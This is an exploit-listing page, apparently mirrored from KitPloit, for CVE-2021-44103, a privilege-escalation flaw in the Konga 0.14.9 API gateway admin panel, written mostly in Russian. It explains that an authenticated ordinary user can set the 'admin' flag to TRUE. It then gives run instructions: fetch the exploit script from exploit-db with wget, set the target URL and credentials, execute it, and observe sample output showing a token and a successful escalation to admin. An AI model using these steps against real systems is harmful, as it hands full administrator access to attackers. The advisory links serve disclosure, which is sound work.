Sploitus

Exploit for CVE-2021-44103

kitploit Β· 2026-08-27

Exploit Code

MARKDOWN80 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-PAULOTRINDADEC-CVE-2021-44103
# CVE-2021-44103

ΠšΠΎΠ½Ρ†Π΅ΠΏΡ‚-эксплойт для KONGA 0.14.9 β€” ΠΏΠΎΠ²Ρ‹ΡˆΠ΅Π½ΠΈΠ΅ ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΉ.

## Π’Π²Π΅Π΄Π΅Π½ΠΈΠ΅

16 ноября 2021 Π³ΠΎΠ΄Π° FabrΓ­cio SalomΓ£o ΠΈ я ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΠ»ΠΈ ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ Π² Konga API Gateways, ΠΏΠΎΠ·Π²ΠΎΠ»ΡΡŽΡ‰ΡƒΡŽ Π»ΡŽΠ±ΠΎΠΌΡƒ Π°ΡƒΡ‚Π΅Π½Ρ‚ΠΈΡ„ΠΈΡ†ΠΈΡ€ΠΎΠ²Π°Π½Π½ΠΎΠΌΡƒ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŽ ΡΡ‚Π°Ρ‚ΡŒ администратором.

## Π‘ΠΎΠΎΠ±Ρ‰Π΅Π½ΠΈΠ΅ ΠΎΠ± уязвимости

ΠŸΡ€ΠΎΠ΄ΡƒΠΊΡ‚: KONGA  
МодСль: 0.14.9  
Π£ΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ: ΠΏΠΎΠ²Ρ‹ΡˆΠ΅Π½ΠΈΠ΅ ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΉ  
ВоздСйствиС: ΠΏΠΎΠ»Π½Ρ‹ΠΉ доступ администратора (Π²Π΅Ρ€Ρ‚ΠΈΠΊΠ°Π»ΡŒΠ½ΠΎΠ΅ ΠΏΠΎΠ²Ρ‹ΡˆΠ΅Π½ΠΈΠ΅ ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΉ)  
АутСнтификация: трСбуСтся  
Автор эксплойта: Fabricio Salomao / Paulo Trindade

## PoC

НиТС создан ΠΎΠ±Ρ‹Ρ‡Π½Ρ‹ΠΉ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒ с ΠΈΠΌΠ΅Π½Π΅ΠΌ "usernormal" Π±Π΅Π· ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΉ.

![Crash](https://assets.kitploit.com/production/public/readmes/30549/ce2efa4a7e815c4dc44025427c561ea56660935135a523452b4dfeb3f6566936.png)

![Crash](https://assets.kitploit.com/production/public/readmes/30549/127e1630dfee2cddfbdef6537e788364b0deebfe0f97057a94df920a09035f93.png)

Π‘ ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ ΠΏΡ€ΠΈΠ²Π΅Π΄Ρ‘Π½Π½ΠΎΠ³ΠΎ Π½ΠΈΠΆΠ΅ запроса Ρ„Π»Π°Π³ "FALSE" Π² ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚Ρ€Π΅ "admin" Π±Ρ‹Π» ΠΈΠ·ΠΌΠ΅Π½Ρ‘Π½ Π½Π° "TRUE".

![Crash](https://assets.kitploit.com/production/public/readmes/30549/8250df9cf141c7ddde336dbbe60ea329a9e14b860f14941679e95d8b5625c8a4.png)

ΠŸΠΎΡΡ‚ΠΎΠΌΡƒ для нас Π±Ρ‹Π» создан эксплойт: https://www.exploit-db.com/exploits/50521

![Crash](https://assets.kitploit.com/production/public/readmes/30549/74792f200f087304a74b1cf7ed722a3d222efd4f80ad4d421150abdf14f56d17.png)

ПослС запуска эксплойта ΠΏΠΎΠ²Ρ‹ΡˆΠ΅Π½ΠΈΠ΅ ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΉ ΠΏΡ€ΠΎΡˆΠ»ΠΎ ΡƒΡΠΏΠ΅ΡˆΠ½ΠΎ!

Π Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚:

![Crash](https://assets.kitploit.com/production/public/readmes/30549/48233a9e6470289365630cd14dfa21a5317e27eee83b6bcbf3c7e213ad479066.jpg)

## Запуск эксплойта

root@kitploit:~
    
    
    wget https://www.exploit-db.com/raw/50521 -O 50521.py
    
    Edit 50521.py
    
    Modify:
    
    urlkonga = "http://www.example.com:1337/" # change to your konga address
    identifier = "usernormalkonga"            # change user
    password = "changeme"                     # change password
    
    Execute:
    
    python 50521.py
    
    [+] Attack
    [+] Token eyJhbGciOiJIUzI1NiJ9.MTA.JFmJ0Vd3z5oeOTokSL0qfPZSOJmnZKEjZVzCJs_AM-U
    [+] Change Normal User to Admin
    [+] Success
    

## Бсылки

http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html

https://www.exploit-db.com/exploits/50521

https://vulners.com/cve/CVE-2021-44103

https://github.com/advisories/GHSA-f2mp-8fgg-7465

https://security.snyk.io/vuln/SNYK-JS-KONGA-2434821

https://twitter.com/CVEnew/status/1508455166885961732

https://twitter.com/search?q=CVE-2021-44103&src=typed_query